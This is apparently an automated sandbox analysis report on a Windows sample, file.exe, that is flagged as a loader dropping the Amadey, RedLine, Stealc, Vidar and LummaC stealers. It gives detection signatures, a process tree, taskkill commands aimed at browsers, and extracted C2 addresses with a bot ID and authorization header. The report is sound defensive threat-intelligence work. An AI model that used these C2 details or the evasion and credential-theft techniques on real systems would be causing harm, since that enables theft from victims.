Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1573850
MD5:	ad7f121646aa374af133772519375710
SHA1:	4e85ad004aa170ed53b7818b78e0b12e042b18ea
SHA256:	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to determine the online IP of the system

Creates a thread in another existing process (thread injection)

Creates files in the system32 config directory

Creates multiple autostart registry keys

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to enumerate network shares

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Remote Thread Creation By Uncommon Source Image

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD7F121646AA374AF133772519375710)

skotes.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: AD7F121646AA374AF133772519375710)

skotes.exe (PID: 8168 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AD7F121646AA374AF133772519375710)

skotes.exe (PID: 7820 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AD7F121646AA374AF133772519375710)

dwVrTdy.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 7320 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

AzVRM7c.exe (PID: 1528 cmdline: "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 5096 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

t5abhIx.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

u1w30Wt.exe (PID: 4928 cmdline: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" MD5: FF1E7643A5C9294BD8E8FD743B323C8F)

audiodg.exe (PID: 4952 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 5048 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

svchost.exe (PID: 4812 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

graph.exe (PID: 4940 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

2DB3A69DE7692371543510.exe (PID: 3800 cmdline: "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe" MD5: FF1E7643A5C9294BD8E8FD743B323C8F)

msiexec.exe (PID: 5212 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

audiodg.exe (PID: 6760 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

svchost.exe (PID: 5956 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

graph.exe (PID: 1264 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

F0A3.tmp.ctx.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)

F0A3.tmp.ctx.exe (PID: 6600 cmdline: "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)

FBFF.tmp.fcxcx.exe (PID: 520 cmdline: "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe" MD5: F0AAF1B673A9316C4B899CCC4E12D33E)

firefox.exe (PID: 5632 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 504 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

be08f59021.exe (PID: 5584 cmdline: "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe" MD5: 5A3F6AA1107D91BDC0430E2A0C1F4F26)

602c785fe5.exe (PID: 1660 cmdline: "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe" MD5: E477E0C89BDFE4F98170878F85624A0C)

taskkill.exe (PID: 6796 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4524 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2592 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1672 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4408 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 980 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

d8d3046b98.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe" MD5: CD917C036DA4DC2B3E30E12B135A87E2)

dwVrTdy.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 1900 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "fvcxcx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

Memory Dumps

Source	Rule	Description	Author	Strings
0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dded:$s2: ReflectiveLoader@
00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dded:$s2: ReflectiveLoader@
0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 602c785fe5.exe PID: 1660	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
44.2.firefox.exe.144aa0f0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5ed:$s2: ReflectiveLoader@
43.2.firefox.exe.2392c270000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5ed:$s2: ReflectiveLoader@
44.2.firefox.exe.144aa140000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dded:$s2: ReflectiveLoader@
44.2.firefox.exe.144aa140000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
44.2.firefox.exe.144aa0f0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
43.2.firefox.exe.2392c270000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
20.3.explorer.exe.d60a960.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x87dfd:$s2: ReflectiveLoader@
43.2.firefox.exe.2392dca0000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
20.0.explorer.exe.89a0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5ed:$s2: ReflectiveLoader@
20.3.explorer.exe.d60a960.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x87dfd:$s2: ReflectiveLoader@
20.0.explorer.exe.89a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9ed:$s2: ReflectiveLoader@
43.2.firefox.exe.2392dca0000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dded:$s2: ReflectiveLoader@
3.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.240000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\602c785fe5.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\602c785fe5.exe

Sigma detected: Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 3968, StartAddress: 2C28AA50, TargetImage: C:\Program Files\Mozilla Firefox\firefox.exe, TargetProcessId: 5632

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe, ParentProcessId: 4928, ParentProcessName: u1w30Wt.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4812, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe, ParentProcessId: 4928, ParentProcessName: u1w30Wt.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4812, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:28.617180+0100	2028371	3	Unknown Traffic	192.168.2.10	50238	172.67.213.48	443	TCP
2024-12-12T16:50:33.485834+0100	2028371	3	Unknown Traffic	192.168.2.10	50259	172.67.213.48	443	TCP
2024-12-12T16:50:35.808854+0100	2028371	3	Unknown Traffic	192.168.2.10	50263	172.67.213.48	443	TCP
2024-12-12T16:50:37.870851+0100	2028371	3	Unknown Traffic	192.168.2.10	50267	172.67.213.48	443	TCP
2024-12-12T16:50:40.450539+0100	2028371	3	Unknown Traffic	192.168.2.10	50271	172.67.213.48	443	TCP
2024-12-12T16:50:43.338354+0100	2028371	3	Unknown Traffic	192.168.2.10	50284	172.67.213.48	443	TCP
2024-12-12T16:50:49.617379+0100	2028371	3	Unknown Traffic	192.168.2.10	50299	172.67.213.48	443	TCP
2024-12-12T16:50:52.161845+0100	2028371	3	Unknown Traffic	192.168.2.10	50308	172.67.213.48	443	TCP

ET MALWARE Amadey Bot Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:22.815800+0100	2044623	1	A Network Trojan was detected	192.168.2.10	50047	185.215.113.43	80	TCP

ET MALWARE Generic Request to gate.php Dotted-Quad

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:37.185345+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:39.209260+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49943	185.81.68.147	80	TCP
2024-12-12T16:48:57.805054+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49989	185.81.68.147	80	TCP
2024-12-12T16:48:58.053827+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49996	185.81.68.147	80	TCP
2024-12-12T16:49:00.539654+0100	2022986	1	A Network Trojan was detected	192.168.2.10	49998	185.81.68.147	80	TCP
2024-12-12T16:49:00.782649+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50008	185.81.68.147	80	TCP
2024-12-12T16:49:01.392290+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50011	185.81.68.147	80	TCP
2024-12-12T16:49:03.271064+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50017	185.81.68.147	80	TCP
2024-12-12T16:49:05.207591+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50021	185.81.68.147	80	TCP
2024-12-12T16:49:07.246330+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50030	185.81.68.147	80	TCP
2024-12-12T16:49:08.908525+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50034	185.81.68.147	80	TCP
2024-12-12T16:49:10.703399+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50036	185.81.68.147	80	TCP
2024-12-12T16:49:12.687511+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50038	185.81.68.147	80	TCP
2024-12-12T16:49:14.392460+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50040	185.81.68.147	80	TCP
2024-12-12T16:49:16.046870+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50041	185.81.68.147	80	TCP
2024-12-12T16:49:17.891832+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50043	185.81.68.147	80	TCP
2024-12-12T16:49:19.946252+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50045	185.81.68.147	80	TCP
2024-12-12T16:49:22.019394+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50048	185.81.68.147	80	TCP
2024-12-12T16:49:23.947453+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50050	185.81.68.147	80	TCP
2024-12-12T16:49:25.845097+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50060	185.81.68.147	80	TCP
2024-12-12T16:49:27.692012+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50061	185.81.68.147	80	TCP
2024-12-12T16:49:29.585615+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50064	185.81.68.147	80	TCP
2024-12-12T16:49:32.035333+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50067	185.81.68.147	80	TCP
2024-12-12T16:49:32.277224+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50068	185.81.68.147	80	TCP
2024-12-12T16:49:32.570048+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50070	185.81.68.147	80	TCP
2024-12-12T16:49:34.388673+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50071	185.81.68.147	80	TCP
2024-12-12T16:49:36.018645+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50072	185.81.68.147	80	TCP
2024-12-12T16:49:36.259903+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50075	185.81.68.147	80	TCP
2024-12-12T16:49:36.271923+0100	2022986	1	A Network Trojan was detected	192.168.2.10	50076	185.81.68.147	80	TCP
